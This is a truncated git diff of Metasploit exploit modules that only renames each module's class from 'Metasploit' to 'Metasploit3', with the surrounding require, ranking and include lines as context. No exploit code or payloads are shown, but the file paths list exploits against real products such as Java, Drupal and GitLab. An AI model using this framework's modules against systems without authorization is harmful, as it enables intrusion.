a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 0440132273..3942291ee4 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 85880c89be..3a123768f2 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index bd65c4a36f..b832f9ea9b 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 66caacbec5..9280d870ad 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 03e0c61574..7c37c553a2 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index 2774e68283..4dfad212b6 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 10aafbfa00..597c3fdf2f 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 4419e9abf7..906d07867f 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index ece18ab03c..32f55c5613 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 43115bd988..9e4931f342 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index e752834c6a..9fa97d5e57 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index 28f6f2285d..c752549994 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 355a1be3f5..41a3705785 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index e395294533..46be8c7c58 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 1c238af16a..82bc228e50 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index 417f3c0f14..cab28b512a 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index a988946d6c..e2f4651f3e 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index a0ce1ce051..dbe08a3035 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index 6d775b69c4..b01bba4436 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index 0b3627ac4c..bf763ea14d 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -6,7 +6,7 @@ require 'msf/core/constants' require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 193c0e7cc8..0e426d005b 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 571893076f..470e2f1eb5 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 8874bb7456..5a1e3c5e1b 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d166e13df1..685a0ae6d7 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index 31238bb8b4..ee65df2cc2 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index 700acb3cd7..fc668215fb 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 100d886f12..1e15976eb4 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index d997509bbb..96e8152bf5 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index 17bca08a2b..3b72a6101e 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 3c221cf89d..8fe12bb9d3 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 0ae9df8508..3a910ece59 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index ca60cf0926..9d501c7793 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Gdb diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 141aa03242..47840b548e 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index fdeedab472..d8f6182078 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 82d4741b63..5899e09be6 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 2fe7ddef30..7c34f04663 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 3c3c9361d9..a7a8dbd4f9 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index 88cc3f06d1..fb6be15379 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 00c386f116..645a337f93 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 1b3b7f08e7..ca192f495c 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index 24684cb998..30b5987cb4 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index af6d21ba0a..348dea375a 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bb15b79b7f..758cbcf46e 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 2399821e7d..865ca0fbd2 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 577ff06969..f999bafa7c 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index 673446bdb7..ac0adec7c5 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index a7f9b6287c..b25107fc24 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 9075976e00..eda04d55c3 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 3f0096758b..542509bd28 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index e5984efe03..07e3741261 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index d63d663e65..da1dbb571e 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb index 739b9f3277..5f1b1054dc 100644 --- a/modules/exploits/multi/http/gitlab_shell_exec.rb +++ b/modules/exploits/multi/http/gitlab_shell_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 1361bf502e..8258c0e9f1 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 1d35508be0..43782be301 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -8,7 +8,7 @@ require 'nokogiri' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index d5062fb8fa..a829e464cc 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 4c5786cf0d..19cdc98388 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index b8a835004e..2490945fbb 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index d88f1256a6..e27433b5a2 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index aabcf6c2ee..aa418720b9 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index c0255cfbef..25f76c5668 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index aaa3089c34..329b8ee316 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index ce2305794e..0fc393a14e 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ 